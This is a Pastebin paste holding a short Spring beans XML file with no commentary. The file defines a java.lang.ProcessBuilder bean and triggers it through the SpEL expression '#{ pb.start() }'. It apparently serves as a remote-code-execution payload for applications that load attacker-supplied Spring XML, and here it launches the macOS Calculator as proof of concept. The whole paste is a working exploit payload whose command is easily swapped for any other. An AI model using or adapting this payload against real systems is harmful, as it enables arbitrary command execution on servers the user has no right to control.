Advertisement
shadowsock5

Untitled

Mar 29th, 2020
62
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.48 KB | None | 0 0
  1. <beans xmlns="http://www.springframework.org/schema/beans"
  2. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  3. xsi:schemaLocation="
  4. http://www.springframework.org/schema/beans
  5. http://www.springframework.org/schema/beans/spring-beans.xsd
  6. ">
  7. <bean id="pb" class="java.lang.ProcessBuilder">
  8. <constructor-arg value="/System/Applications/Calculator.app/Contents/MacOS/Calculator" />
  9. <property name="notepadopener" value="#{ pb.start() }"/>
  10. </bean>
  11. </beans>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement